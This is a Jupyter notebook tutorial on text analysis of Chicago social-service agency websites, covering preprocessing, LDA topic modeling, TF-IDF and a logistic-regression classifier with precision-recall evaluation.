_____no_output_____
###Markdown
Load the DataOur dataset for this tutorial will be a description of social services in Chicago, and how the subset we're using was created, can be found in the `data` folder in this tutorial.
###Code
df_socialservices_data = pd.read_csv('./data/socialservices.csv')
###Output
_____no_output_____
###Markdown
Explore the Data
###Code
df_socialservices_data.head()
###Output
_____no_output_____
###Markdown
Our table has 7 fields: `FACID`, `facname`, `factype`, `facurl`, `facloc`, `abouturl`, and `textfromurl`. How many facilities and types of facilities are in this dataset?
###Code
df_socialservices_data.factype.unique()
df_socialservices_data.facname.unique()
df_socialservices_data.facname.unique().shape
###Output
_____no_output_____
###Markdown
There are 48 facilities, categorized into 4 unique facility types: education, income, health, and safety net. Topic ModelingWe are going to apply topic modeling, an unsupervised learning method, to our corpus to find the high-level topics in our corpus as a "first go" for exploring our data. Through this process, we'll discuss how to clean and preprocess our data to get the best results.Topic modeling is a broad subfield of machine learning and natural language processing. We are going to focus on a common modeling approach called Latent Dirichlet Allocation (LDA). To use topic modeling, we first have to assume that topics exist in our corpus, and that some small number of these topics can "explain" the corpus. Topics in this context refer to words from the corpus, in a list that is ranked by probability. A single document can be explained by multiple topics. For instance, an article on net neutrality would fall under the topic "technology" as well as the topic "politics." The set of topics used by a document is known as the document's allocation, hence, the name Latent Dirchlet Allocation, each document has an allocation of latent topics allocated by Dirchlet distribution. Processing Text DataThe first important step in working with text data is cleaning and processing the data, which includes (but is not limited to) *forming a corpus of text, tokenization, removing stop-words, finding words co-located together (N-grams), and stemming and lemmatization*. Each of these steps will be discussed below. The ultimate goal is to transform our text data into a form an algorithm can work with, because a document or a corpus of text cannot be fed directly into an algorithm. Algorithms expect numerical feature vectors with certain fixed sizes, and can't handle documents, which are basically sequences of symbols with variable length. We will be transforming our text corpus into a *bag of n-grams* to be further analyzed. In this form our text data is represented as a matrix where each row refers to a specific job description (document) and each column is the occurence of a word (feature). Bag of N-gram Representation ExampleUltimately, we want to take our collection of documents, corpus, and convert it into a matrix. Fortunately, `sklearn` has a pre-built object, `CountVectorizer`, that can tokenize, eliminate stopwords, identify n-grams, and stem our corpus, and output a matrix in one step. Before we apply the vectorizer to our corpus of data, let's apply it to a toy example so that we see what the output looks like and how a bag of words is represented.
###Code
def create_bag_of_words(corpus,
NGRAM_RANGE=(0,1),
stop_words = None,
stem = False,
MIN_DF = 0.05,
MAX_DF = 0.95,
USE_IDF=False):
"""
Turn a corpus of text into a bag-of-words.
Parameters
-----------
corpus: ls
test of documents in corpus
NGRAM_RANGE: tuple
range of N-gram. Default (0,1)
stop_words: ls
list of commonly occuring words that have little semantic
value
stem: bool
use a stemmer to stem words
MIN_DF: float
exclude words that have a frequency less than the threshold
MAX_DF: float
exclude words that have a frequency greater than the threshold
Returns
-------
bag_of_words: scipy sparse matrix
scipy sparse matrix of text
features:
ls of words
"""
#parameters for vectorizer
ANALYZER = "word" #unit of features are single words rather then phrases of words
STRIP_ACCENTS = 'unicode'
stemmer = nltk.SnowballStemmer("english")
if stem:
tokenize = lambda x: [stemmer.stem(i) for i in x.split()]
else:
tokenize = None
vectorizer = CountVectorizer(analyzer=ANALYZER,
tokenizer=tokenize,
ngram_range=NGRAM_RANGE,
stop_words = stop_words,
strip_accents=STRIP_ACCENTS,
min_df = MIN_DF,
max_df = MAX_DF)
bag_of_words = vectorizer.fit_transform( corpus ) #transform our corpus is a bag of words
features = vectorizer.get_feature_names()
if USE_IDF:
NORM = None #turn on normalization flag
SMOOTH_IDF = True #prvents division by zero errors
SUBLINEAR_IDF = True #replace TF with 1 + log(TF)
transformer = TfidfTransformer(norm = NORM,smooth_idf = SMOOTH_IDF,sublinear_tf = True)
#get the bag-of-words from the vectorizer and
#then use TFIDF to limit the tokens found throughout the text
tfidf = transformer.fit_transform(bag_of_words)
return tfidf, features
else:
return bag_of_words, features
toy_corpus = ['this is document one', 'this is document two', 'text analysis on documents is fun']
toy_bag_of_words, toy_features = create_bag_of_words(toy_corpus)
toy_corpus
toy_features
np_bag_of_words = toy_bag_of_words.toarray()
np_bag_of_words
###Output
_____no_output_____
###Markdown
Our data has been transformed from a document into a 3 x 9 matrix, where each row in the matrix corresponds to a document, and each column corresponds to a feature (in the order they appear in `toy_features`). A 1 indicates the existence of the feature or word in the document, and a 0 indicates the word is not present.It is very common that this representation will be a "sparse" matrix, or a matrix that has a lot of 0s. With sparse matrices, it is often more efficient to keep track of which values *aren't* 0 and where those non-zero entries are located, rather than to save the entire matrix. To save space, the `scipy` library has special ways of storing sparse matrices in an efficient way. Our toy corpus is now ready to be analyzed. We used this toy example to illustrate how a document is turned into a matrix to be used in text analysis. When you're applying this to real text data, the matrix will be much larger and harder to interpret, but it's important that you know the process. --- Exercise 1 To check your knowledge, make your own toy corpus and turn it into a matrix.
###Code
#solution
exercise_corpus = ['Batman is friends with Superman',
'Superman is enemies with Lex Luthor',
'Batman is enemies with Lex Luthor']
exercise_bag_of_words, exercise_features = create_bag_of_words(exercise_corpus)
np_bag_of_words = exercise_bag_of_words.toarray()
exercise_features
np_bag_of_words
###Output
_____no_output_____
###Markdown
--- Word CountsAs an initial look into the data, we can examine the most frequently occuring words in our corpus. We can sum the columns of the bag_of_words and then convert to a numpy array. From here we can zip the features and word_count into a dictionary, and display the results.
###Code
def get_word_counts(bag_of_words, feature_names):
"""
Get the ordered word counts from a bag_of_words
Parameters
----------
bag_of_words: obj
scipy sparse matrix from CounterVectorizer
feature_names: ls
list of words
Returns
-------
word_counts: dict
Dictionary of word counts
"""
np_bag_of_words = bag_of_words.toarray()
word_count = np.sum(np_bag_of_words,axis=0)
np_word_count = np.asarray(word_count).ravel()
dict_word_counts = dict( zip(feature_names, np_word_count) )
orddict_word_counts = OrderedDict(
sorted(dict_word_counts.items(), key=lambda x: x[1], reverse=True), )
return orddict_word_counts
get_word_counts(toy_bag_of_words, toy_features)
###Output
_____no_output_____
###Markdown
Note that the words "document" and "documents" both appear separately in the list. Should they be treated as the same words, since one is just the plural of the other, or should they be considered distinct words? These are the types of decisions you will have to make in your preprocessing steps. --- Exercise 2 Get the word counts of your exercise corpus.
###Code
get_word_counts(exercise_bag_of_words, exercise_features)
###Output
_____no_output_____
###Markdown
Text CorporaFirst we need to form our corpus, or the set of all descriptions from all websites. We can pull out the array of descriptions from the data frame using the data frame's `.values` attribute.
###Code
corpus = df_socialservices_data['textfromurl'].values #pull all the descriptions and put them in a numpy array
corpus
def create_topics(tfidf, features, N_TOPICS=3, N_TOP_WORDS=5,):
"""
Given a matrix of features of text data generate topics
Parameters
-----------
tfidf: scipy sparse matrix
sparse matrix of text features
N_TOPICS: int
number of topics (default 10)
N_TOP_WORDS: int
number of top words to display in each topic (default 10)
Returns
-------
ls_keywords: ls
list of keywords for each topics
doctopic: array
numpy array with percentages of topic that fit each category
N_TOPICS: int
number of assumed topics
N_TOP_WORDS: int
Number of top words in a given topic.
"""
with progressbar.ProgressBar(max_value=progressbar.UnknownLength) as bar:
i=0
lda = LatentDirichletAllocation( n_topics= N_TOPICS,
learning_method='online') #create an object that will create 5 topics
bar.update(i)
i+=1
doctopic = lda.fit_transform( tfidf )
bar.update(i)
i+=1
ls_keywords = []
for i,topic in enumerate(lda.components_):
word_idx = np.argsort(topic)[::-1][:N_TOP_WORDS]
keywords = ', '.join( features[i] for i in word_idx)
ls_keywords.append(keywords)
print(i, keywords)
bar.update(i)
i+=1
return ls_keywords, doctopic
corpus_bag_of_words, corpus_features = create_bag_of_words(corpus)
###Output
_____no_output_____
###Markdown
Let's examine our features.
###Code
corpus_features
###Output
_____no_output_____
###Markdown
The first aspect to notice about the feature list is that the first few entries are numbers that have no real semantic meaning. The feature lists also includes numerous other useless words, such as prepositions and articles, that will just add noise to our analysis. We can also notice the words *action* and *activities*, or the words *addition* and *additional*, are close enough to each other that it might not make sense to treat them as entirely separate words. Part of your cleaning and preprocessing duties will be manually inspecting your lists of features, seeing where these issues arise, and making decisions to either remove them from your analysis or address them separately. Let's get the count of the number of times that each of the words appears in our corpus.
###Code
get_word_counts(corpus_bag_of_words, corpus_features)
###Output
_____no_output_____
###Markdown
Our top words are articles, prepositions and conjunctions that are not informative whatsoever, so we're probably not going to come up with anything interesting ("garbage in, garbage out"). Nevertheless, let's forge blindly ahead and try to create topics, and see the quality of the results that we get.
###Code
ls_corpus_keywords, corpus_doctopic = create_topics(corpus_bag_of_words, corpus_features)
###Output
_____no_output_____
###Markdown
These topics don't give us any real insight to what the data contains - one of the topics is "and, the, to, of, in"! There are some hints to the subjects of the websites ("YWCA", "youth") and their locations ("Evanston"), but the signal is being swamped by the noise. The word "click" also comes up. This word might be useful in some contexts, but since we scraped this data from websites, it's likely that "click" is more related to the website itself (e.g. "Click here to find out more") as opposed to the content of the website. We'll have to clean and process our data to get any meaningful information out of this text. Text Cleaning and NormalizationTo clean and normalize text, we'll remove all special characters, numbers, and punctuation, so we're left with only the words themselves. Then we will make all the text lowercase; this uniformity will ensure that the algorithm doesn't treat "the" and "The" as different words, for example. To remove the special characters, numbers and punctuation we will use regular expressions. **Regular Expressions**, or "regexes" for short, let you find all the words or phrases in a document or text file that match a certain pattern. These rules are useful for pulling out useful information from a large amount of text. For example, if you want to find all email addresses in a document, you might look for everything that looks like *some combination of letters, _, .* followed by *@*, followed by more letters, and ending in *.com* or *.edu*. If you want to find all the credit card numbers in a document, you might look for everywhere you see the pattern "four numbers, space, four numbers, space, four numbers, space, four numbers." Regexes are also helpful if you are scraping information from websites, because you can use them to separate the content from the HTML code used for formatting the website.A full tutorial on regular expressions would be outside the scope of this tutorial, but many good tutorials that can be found on-line. [regex101.com](regex101.com) is also a great interactive tool for developing and checking regular expressions.>"Some people, when confronted with a problem, think >'I know, I'll use regular expressions.' Now they have two problems."> -- Jaime Zawinski*A word of warning:* Regexes can work much more quickly than plain text sorting; however, if your regular expressions are becoming overly complicated, it's a good idea to find a simpler way to do what you want to do. Any developer should keep in mind there is a trade-off between optimization and understandability. The general philosophy of programming in Python is that your code is meant to be as understandable by *people* as much as possible, because human time is more valuable than computer time. You should therefore lean toward understandability rather than overly optimizing your code to make it run as quickly as possible. Your future-self, code-reviewers, people who inherit your code, and anyone else who has to make sense of your code in the future will appreciate it. For our purposes, we are going to use a regular expression to match all characters that are not letters -- punctuation, quotes, special characters and numbers -- and replace them with spaces. Then we'll make all of the remaining characters lowercase. We will be using the `re` library in python for regular expression matching.
###Code
#get rid of the punctuations and set all characters to lowercase
RE_PREPROCESS = r'\W+|\d+' #the regular expressions that matches all non-characters
#get rid of punctuation and make everything lowercase
#the code below works by looping through the array of text ("corpus")
#for a given piece of text ("comment") we invoke the `re.sub` command
#the `re.sub` command takes 3 arguments: (1) the regular expression to match,
#(2) what we want to substitute in place of that matching string (' ', a space)
#and (3) the text we want to apply this to.
#we then invoke the `lower()` method on the output of the `re.sub` command
#to make all the remaining characters lowercase.
#the result is a list, where each entry in the list is a cleaned version of the
#corresponding entry in the original corpus.
#we then make the list into a numpy array to use it in analysis
processed_corpus = np.array( [ re.sub(RE_PREPROCESS, ' ', comment).lower() for comment in corpus] )
###Output
_____no_output_____
###Markdown
First Description, Before Cleaning
###Code
corpus[0]
###Output
_____no_output_____
###Markdown
This text includes a lot of useful information, but also includes some things we don't want or need. There are some weird special characters (like `\xe2\x80\x94`). There are also some numbers, which are informative and interesting to a human reading the text (phone numbers, addresses, "since 1899," "impacts the lives of nearly 20,000 children"), but when we break down the documents into individual words, the numbers will become meaningless. We'll also want to remove all punctuation, so that we can say any two things separated by a space are individual words. First Description, After Cleaning
###Code
processed_corpus[0]
###Output
_____no_output_____
###Markdown
All lowercase, all numbers and special characters have been removed. Out text is now normalized. TokenizationNow that we've cleaned our text, we can *tokenize* it by deciding which words or phrases are the most meaningful. In this case, we'll want to split our text into individual words. Normally the `CountVectorizer` handles this for us.To go from a whole document to a list of individual words, we can use the `.split()` command. By default, this command splits based on spaces in between words, so we don't need to specify that explicitly.
###Code
tokens = processed_corpus[0].split()
tokens
###Output
_____no_output_____
###Markdown
StopwordsStopwords are words that are found commonly throughout a text and carry little semantic meaning. Examples of common stopwords are prepositions, articles and common nouns. For example, the words *the* and *of* are totally ubiquitous, so they won't serve as meaningful features, whether to distinguish documents from each other or to tell what a given document is about. You may also run into words that you want to remove based on where you obtained your corpus of text or what it's about. There are many lists of common stopwords available for you to use, both for general documents and for specific contexts, so you don't have to start from scratch. We can eliminate stopwords by checking all the words in our corpus against a list of commonly occuring stopwords.
###Code
eng_stopwords = stopwords.words('english')
eng_stopwords
#sample of stopwords
#this is an example of slicing where we implicitly start at the beginning and move to the end
#we select every 10th entry in the array
eng_stopwords[::10]
###Output
_____no_output_____
###Markdown
Notice that this list includes "weren" and "hasn" as well as single letters ("t"). Why do you think these are contained in the list of stopwords? --- Exercise 3Try slicing after 5th word.
###Code
eng_stopwords[::5]
###Output
_____no_output_____
###Markdown
--- Topic Modeling on Cleaned DataNow that we've cleaned up our data a little bit, let's see what our bag of words looks like.
###Code
processed_bag_of_words, processed_features = create_bag_of_words(processed_corpus, stop_words=eng_stopwords)
dict_processed_word_counts = get_word_counts(processed_bag_of_words, processed_features)
dict_processed_word_counts
###Output
_____no_output_____
###Markdown
Much better! Now this is starting to look like a reasonable representation of our corpus of text. We mentioned that, in addition to stopwords that are common across all types of text analysis problems, there wil also be specific stopwords based on the context of your domain. Notice how the top words include words like "services," "youth," "community," "mission"? It makes sense that these words are so common, but we'd expect to see them in every website in our corpus - after all, we're looking at websites of social service organizations in Chicago! - so they won't be very helpful in analysis. One quick way to remove some of these domain-specific stopwords is by dropping some of your most frequent words. We'll start out by dropping the top 20. You'll want to change this number, playing with making it bigger and smaller, to see how it affects your resulting topics.
###Code
top_20_words = list(dict_processed_word_counts.keys())[:20]
domain_specific_stopwords = eng_stopwords + top_20_words
processed_bag_of_words, processed_features = create_bag_of_words(processed_corpus,
stop_words=domain_specific_stopwords)
dict_processed_word_counts = get_word_counts(processed_bag_of_words, processed_features)
dict_processed_word_counts
###Output
_____no_output_____
###Markdown
This is a bit better - although we still see some words that are probably very common ("care", "communities"), words like "catholic," "north," and "violence" will probably help us come up with more specific categories within the broader realm of social services. Let's see what topics we produce.
###Code
processed_keywords, processed_doctopic = create_topics(processed_bag_of_words,
processed_features)
###Output
_____no_output_____
###Markdown
Now we are starting to get somewhere! We can manipulate the number of topics we want to find and the number of words to use for each topic to see if we can understand more from our corpus.
###Code
processed_keywords, processed_doctopic = create_topics(processed_bag_of_words,
processed_features,
N_TOPICS = 5,
N_TOP_WORDS= 10)
###Output
_____no_output_____
###Markdown
Some structure is starting to reveal itself - "legal" and "law" appear in the same topic, as do "violence," "domestic," and "women" (probably appearing in websites of women's shelters). Adding more topics has revealed to larger subtopics. Let's see if increasing the number of topics gives us more information.However, we can see that "donatebutton" and "companylogo" are still present - these are more likely artifacts of the websites than useful information about the charities! This is an iterative process - after seeing the results of some analysis, you will need to go back to the preprocessing step and add more words to your list of stopwords or change how you cleaned the data.
###Code
processed_keywords, processed_doctopic = create_topics(processed_bag_of_words,
processed_features,
N_TOPICS = 10,
N_TOP_WORDS= 15)
###Output
_____no_output_____
###Markdown
This looks like a good amount of topics for now. Some of the top words are quite similar, like "volunteer" and "volunteers," or "child" and "children." Let's move to stemming and lemmatization. Stemming and LemmatizationWe can further process our text through *stemming and lemmatization*, or replacing words with their root or simplest form. For example "systems," "systematic," and "system" are all different words, but we can replace all these words with "system" without sacrificing much meaning. A **lemma** is the original dictionary form of a word (e.g. the lemma for "lies," "lied," and "lying" is "lie"). The process of turning a word into its simplest form is **stemming**. There are several well known stemming algorithms -- Porter, Snowball, Lancaster -- that all have their respective strengths and weaknesses. For this tutorial, we'll use the Porter Stemmer.
###Code
stemmer = SnowballStemmer("english")
print(stemmer.stem('lies'))
print(stemmer.stem("lying"))
print(stemmer.stem('systematic'))
print(stemmer.stem("running"))
processed_bag_of_words, processed_features = create_bag_of_words(processed_corpus,
stop_words=domain_specific_stopwords,
stem=False)
processed_keywords, processed_doctopic = create_topics(processed_bag_of_words,
processed_features,
N_TOPICS = 10,
N_TOP_WORDS= 15)
###Output
_____no_output_____
###Markdown
N-gramsObviously, reducing a document to a bag of words means losing much of its meaning - we put words in certain orders, and group words together in phrases and sentences, precisely to give them more meaning. If you follow the processing steps we've gone through so far, splitting your document into individual words and then removing stopwords, you'll completely lose all phrases like "kick the bucket," "commander in chief," or "sleeps with the fishes." One way to address this is to break down each document similarly, but rather than treating each word as an individual unit, treat each group of 2 words, or 3 words, or *n* words, as a unit. We call this a "bag of *n*-grams," where *n* is the number of words in each chunk. Then you can analyze which groups of words commonly occur together (in a fixed order). Let's transform our corpus into a bag of n-grams with *n*=2: a bag of 2-grams, AKA a bag of bi-grams.
###Code
processed_bag_of_words, processed_features = create_bag_of_words(processed_corpus,
stop_words=domain_specific_stopwords,
stem=True,
NGRAM_RANGE=(0,2))
processed_keywords, processed_doctopic = create_topics(processed_bag_of_words,
processed_features,
N_TOPICS = 10,
N_TOP_WORDS= 15)
###Output
_____no_output_____
###Markdown
We can see that this lets us uncover patterns that we couldn't when we just used a bag of words: "north shore" and "domest violenc" come up as words. Note that this still includes the individual words, as well as the bi-grams. TF-IDF (Term Frequency-Inverse Document Frequency)A final step in cleaning and processing our text data is **Term Frequency-Inverse Document Frequency (TF-IDF)**. TF-IDF is based on the idea that the words (or terms) that are most related to a certain topic will occur frequently in documents on that topic, and infrequently in other. To reweight words so that the we capture words that are unique to a document and suppress words that are common throughout the corpus by inversely weighting them by their frequency that are common throughout the corpus
###Code
processed_bag_of_words, processed_features = create_bag_of_words(processed_corpus,
stop_words=domain_specific_stopwords,
stem=True,
NGRAM_RANGE=(0,2),
USE_IDF = True)
dict_word_counts = get_word_counts(processed_bag_of_words,
processed_features)
dict_word_counts
###Output
_____no_output_____
###Markdown
The words counts have been reweighted to emphasize the more meaningful words of the corpus, while de-emphasizing the words that are found commonly throughout the corpus.
###Code
processed_keywords, processed_doctopic = create_topics(processed_bag_of_words,
processed_features,
N_TOPICS = 10,
N_TOP_WORDS= 15)
###Output
_____no_output_____
###Markdown
--- Exercise 4You can only develop an intuition for the right number of topics and topic words suitable for a given problem by iterating until you find a good match. Change the number of topics and topic words until you get an intution of how many words and topics are enough.
###Code
exercise_keywords, exercise_doctopic = create_topics(processed_bag_of_words,
processed_features,
N_TOPICS = 5,
N_TOP_WORDS= 25)
exercise_keywords, exercise_doctopic = create_topics(processed_bag_of_words,
processed_features,
N_TOPICS = 10,
N_TOP_WORDS= 25)
###Output
_____no_output_____
###Markdown
---
###Code
#grab the topic_id of the majority topic for each document and store it in a list
ls_topic_id = [np.argsort(processed_doctopic[comment_id])[::-1][0] for comment_id in range(len(corpus))]
df_socialservices_data['topic_id'] = ls_topic_id #add to the dataframe so we can compare with the job titles
###Output
_____no_output_____
###Markdown
Now that each row is tagged with a topic ID. Let's see how well the topics explain the social services by looking at the first topic, and seeing how similar the social services within that topic are to each other.
###Code
topic_num = 0
print(processed_keywords[topic_num])
df_socialservices_data[ df_socialservices_data.topic_id == topic_num ].head(10)
###Output
_____no_output_____
###Markdown
--- Exercise 5Examine the other topic IDs, and see if the "topics" we identified make sense as groupings of social service agencies.
###Code
topic_num = 3
print(processed_keywords[topic_num])
df_socialservices_data[ df_socialservices_data.topic_id == topic_num ].head(10)
###Output
_____no_output_____
###Markdown
--- Supervised Learning: Document ClassificationPreviously, we used topic modeling to infer relationships between social service facilities within the data. That is an example of unsupervised learning: we were looking to uncover structure in the form of topics, or groups of agencies, but we did not necessarily know the ground truth of how many groups we should find or which agencies belonged in which group. Now we turn our attention to supervised learning. In supervised learning, we have a *known* outcome or label (*Y*) that we want to produce given some data (*X*), and in general, we want to be able to produce this *Y* when we *don't* know it, or when we *only* have *X*. In order to produce labels we need to first have examples our algorithm can learn from, a "training set." In the context of text analysis, developing a training set can be very expensive, as it can require a large amount of human labor or linguistic expertise. **Document classification** is an example of supervised learning in which want to characterize our documents based on their contents (*X*). A common example of document classification is spam e-mail detection. Another example of supervised learning in text analysis is *sentiment analysis*, where *X* is our documents and *Y* is the state of the author. This "state" is dependent on the question you're trying to answer, and can range from the author being happy or unhappy with a product to the author being politically conservative or liberal. Another example is *part-of-speech tagging* where *X* are individual words and *Y* is the part-of-speech. In this section, we'll train a classifier to classify social service agencies. Let's see if we can label a new website as belonging to facility type "income" or "health." Load the Data
###Code
df_socialservices_data.factype.value_counts()
mask = df_socialservices_data.factype.isin(['income','health'])
df_income_health = df_socialservices_data[mask]
df_train, df_test = train_test_split(df_income_health, test_size=0.20, random_state=17)
df_train.head()
df_train['factype'].unique()
Counter(df_train['factype'].values)
df_test.head()
df_test['factype'].unique()
Counter(df_test['factype'].values)
###Output
_____no_output_____
###Markdown
Process DataIn order to feed out data into a classifier, we need to pull out the labels (*Y*) and a clean corpus of documents (*X*) for our training and testing sets.
###Code
train_labels = df_train.factype.values
train_corpus = np.array( [re.sub(RE_PREPROCESS, ' ', text).lower() for text in df_train.textfromurl.values])
test_labels = df_test.factype.values
test_corpus = np.array( [re.sub(RE_PREPROCESS, ' ', text).lower() for text in df_test.textfromurl.values])
labels = np.append(train_labels, test_labels)
###Output
_____no_output_____
###Markdown
Just as we had done in the unsupervised learning context, we have to transform our data. This time we have to transform our testing and training set into two different bags of words. The classifier will learn from the training set, and we will evaluate the classifier's performance on the testing set.
###Code
#parameters for vectorizer
ANALYZER = "word" #unit of features are single words rather then phrases of words
STRIP_ACCENTS = 'unicode'
TOKENIZER = None
NGRAM_RANGE = (0,2) #Range for pharases of words
MIN_DF = 0.01 # Exclude words that have a frequency less than the threshold
MAX_DF = 0.8 # Exclude words that have a frequency greater then the threshold
vectorizer = CountVectorizer(analyzer=ANALYZER,
tokenizer=None, # alternatively tokenize_and_stem but it will be slower
ngram_range=NGRAM_RANGE,
stop_words = stopwords.words('english'),
strip_accents=STRIP_ACCENTS,
min_df = MIN_DF,
max_df = MAX_DF)
NORM = None #turn on normalization flag
SMOOTH_IDF = True #prvents division by zero errors
SUBLINEAR_IDF = True #replace TF with 1 + log(TF)
USE_IDF = True #flag to control whether to use TFIDF
transformer = TfidfTransformer(norm = NORM,smooth_idf = SMOOTH_IDF,sublinear_tf = True)
#get the bag-of-words from the vectorizer and
#then use TFIDF to limit the tokens found throughout the text
start_time = time.time()
train_bag_of_words = vectorizer.fit_transform( train_corpus ) #using all the data on for generating features!! Bad!
test_bag_of_words = vectorizer.transform( test_corpus )
if USE_IDF:
train_tfidf = transformer.fit_transform(train_bag_of_words)
test_tfidf = transformer.transform(test_bag_of_words)
features = vectorizer.get_feature_names()
print('Time Elapsed: {0:.2f}s'.format(
time.time()-start_time))
###Output
_____no_output_____
###Markdown
We cannot pass the labels "income" or "health" directly to the classifier. Instead, we to encode them as 0s and 1s using the `labelencoder` part of `sklearn`.
###Code
#relabel our labels as a 0 or 1
le = preprocessing.LabelEncoder()
le.fit(labels)
labels_binary = le.transform(labels)
list(zip(labels,labels_binary))
###Output
_____no_output_____
###Markdown
We also need to create arrays of indices so we can access the training and testing sets accordingly.
###Code
train_size = df_train.shape[0]
train_set_idx = np.arange(0,train_size)
test_set_idx = np.arange(train_size, len(labels))
train_labels_binary = labels_binary[train_set_idx]
test_labels_binary = labels_binary[test_set_idx]
###Output
_____no_output_____
###Markdown
The classifier we are using in the example is LogisticRegression. As we saw in the Machine Learning tutorial, first we decide on a classifier, then we fit the classifier to the data to create a model. We can then test our model on the test set by passing the features (*X*) from our test set to get predicted labels. The model will output the probability of each document being classified as income or health.
###Code
clf = LogisticRegression(penalty='l1')
mdl = clf.fit(train_tfidf, labels_binary[train_set_idx]) #train the classifer to get the model
y_score = mdl.predict_proba( test_tfidf ) #score of the document referring to an income or health agency
###Output
_____no_output_____
###Markdown
Evaluation
###Code
def plot_precision_recall_n(y_true, y_prob, model_name):
"""
y_true: ls
ls of ground truth labels
y_prob: ls
ls of predic proba from model
model_name: str
str of model name (e.g, LR_123)
"""
from sklearn.metrics import precision_recall_curve
y_score = y_prob
precision_curve, recall_curve, pr_thresholds = precision_recall_curve(y_true, y_score)
precision_curve = precision_curve[:-1]
recall_curve = recall_curve[:-1]
pct_above_per_thresh = []
number_scored = len(y_score)
for value in pr_thresholds:
num_above_thresh = len(y_score[y_score>=value])
pct_above_thresh = num_above_thresh / float(number_scored)
pct_above_per_thresh.append(pct_above_thresh)
pct_above_per_thresh = np.array(pct_above_per_thresh)
plt.clf()
fig, ax1 = plt.subplots()
ax1.plot(pct_above_per_thresh, precision_curve, 'b')
ax1.set_xlabel('percent of population')
ax1.set_ylabel('precision', color='b')
ax1.set_ylim(0,1.05)
ax2 = ax1.twinx()
ax2.plot(pct_above_per_thresh, recall_curve, 'r')
ax2.set_ylabel('recall', color='r')
ax2.set_ylim(0,1.05)
name = model_name
plt.title(name)
plt.show()
plot_precision_recall_n(labels_binary[test_set_idx], y_score[:,1], 'LR')
###Output
_____no_output_____
###Markdown
If we examine our precision-recall curve we can see that our precision is 1 up to 40 percent of the population. We can use a "precision at *k*" curve to see what percent of the corpus can be tagged by the classifier, and which should undergo a manual clerical review. Based on this curve, we might say that we can use our classifier to tag the 25% of the documents that have the highest scores as 1, and manually review the rest. Alternatively, we can try to maximize the entire precision-recall space. In this case we need a different metric.
###Code
def plot_precision_recall(y_true,y_score):
"""
Plot a precision recall curve
Parameters
----------
y_true: ls
ground truth labels
y_score: ls
score output from model
"""
precision_curve, recall_curve, pr_thresholds = precision_recall_curve(y_true,y_score[:,1])
plt.plot(recall_curve, precision_curve)
plt.xlabel('Recall')
plt.ylabel('Precision')
auc_val = auc(recall_curve,precision_curve)
print('AUC-PR: {0:1f}'.format(auc_val))
plt.show()
plt.clf()
plot_precision_recall(labels_binary[test_set_idx],y_score)
###Output
_____no_output_____
###Markdown
The AUC shows how accurate our scores are under different cutoff thresholds. The model will output a score between 0 and 1. We specify a range of cutoff values and label all of the examples as 0 or 1 based on whether they are above or below each cutoff value. The closer our scores are to the true values, the more resilient they are to different cutoffs. For instance, if our scores were perfect, our AUC would be 1. Feature Importances
###Code
def display_feature_importances(coef,features, labels, num_features=10):
"""
output feature importances
Parameters
----------
coef: numpy
feature importances
features: ls
feature names
labels: ls
labels for the classifier
num_features: int
number of features to output (default 10)
Example
--------
"""
coef = mdl.coef_.ravel()
dict_feature_importances = dict( zip(features, coef) )
orddict_feature_importances = OrderedDict(
sorted(dict_feature_importances.items(), key=lambda x: x[1]) )
ls_sorted_features = list(orddict_feature_importances.keys())
label0_features = ls_sorted_features[:num_features]
label1_features = ls_sorted_features[-num_features:]
print(labels[0],label0_features)
print(labels[1], label1_features)
display_feature_importances(mdl.coef_.ravel(), features, ['health','income'])
###Output
_____no_output_____
###Markdown
The feature importances give us the words which are the most relevant for distinguishing the type of social service agency (between income and health). Some of these make sense ("city church" seems more likely to be health than income), but some don't make as much sense, or seem to be artifacts from the website that we should remove ("housing humancarelogo"). --- Exercise 6 Display the top 25 feature importances to get an intution of which words are the most and least important. We need to know how to pass into the function we want the top 25 feature importances. We can do this by consulting the docstring of the function. From this docstring we can see that `num_features` is a keyword argument that is set to 10 by default. We can pass `num_features=25` into the keyword argument instead to get the top 25 feature importances.
###Code
display_feature_importances(mdl.coef_.ravel(),
features,
['health','income'],
num_features=25)
###Output
_____no_output_____
###Markdown
--- Cross-validationRecall from the machine learning tutorial that we are seeking the find the most general pattern in the data in order to have to most general model that will be successful at classifying new unseen data. Our previous strategy above was the *Out-of-sample and holdout set*. With this strategy we try to find a general pattern by randomly dividing our data into a test and training set based on some percentage split (e.g., 50-50 or 80-20). We train on the test set and evaluate on the test set, where we pretend that we don't have the labels for the test set. A significant drawback with this approach is that we may be lucky or unlucky with our random split, and so our estimate of how we'd perform on truly new data is overly optimistic or overly pessimistic. A possible solution is to create many random splits into training and testing sets and evaluate each split to estimate the performance of a given model. A more sophisticated holdout training and testing procedure is *cross-validation*. In cross-validation we split our data into *k* folds or partitions, where *k* is usually 5 or 10. We then iterate k times. In each iteration, one of the folds is used as a test set, and the rest of the folds are combined to form the training set. We can then evaluate the performance at each iteration to estimate the performance of a given method. An advantage of using cross-validation is all examples of data are used in the training set at least once.
###Code
def create_test_train_bag_of_words(train_corpus, test_corpus):
"""
Create test and training set bag of words
Parameters
----------
train_corpus: ls
ls of raw text for text corpus.
test_corpus: ls
ls of raw text for train corpus.
Returns
-------
(train_bag_of_words,test_bag_of_words): scipy sparse matrix
bag-of-words representation of train and test corpus
features: ls
ls of words used as features.
"""
#parameters for vectorizer
ANALYZER = "word" #unit of features are single words rather then phrases of words
STRIP_ACCENTS = 'unicode'
TOKENIZER = None
NGRAM_RANGE = (0,2) #Range for pharases of words
MIN_DF = 0.01 # Exclude words that have a frequency less than the threshold
MAX_DF = 0.8 # Exclude words that have a frequency greater then the threshold
vectorizer = CountVectorizer(analyzer=ANALYZER,
tokenizer=None, # alternatively tokenize_and_stem but it will be slower
ngram_range=NGRAM_RANGE,
stop_words = stopwords.words('english'),
strip_accents=STRIP_ACCENTS,
min_df = MIN_DF,
max_df = MAX_DF)
NORM = None #turn on normalization flag
SMOOTH_IDF = True #prevents division by zero errors
SUBLINEAR_IDF = True #replace TF with 1 + log(TF)
USE_IDF = True #flag to control whether to use TFIDF
transformer = TfidfTransformer(norm = NORM,smooth_idf = SMOOTH_IDF,sublinear_tf = True)
#get the bag-of-words from the vectorizer and
#then use TFIDF to limit the tokens found throughout the text
train_bag_of_words = vectorizer.fit_transform( train_corpus )
test_bag_of_words = vectorizer.transform( test_corpus )
if USE_IDF:
train_tfidf = transformer.fit_transform(train_bag_of_words)
test_tfidf = transformer.transform(test_bag_of_words)
features = vectorizer.get_feature_names()
return train_tfidf, test_tfidf, features
from sklearn.cross_validation import StratifiedKFold
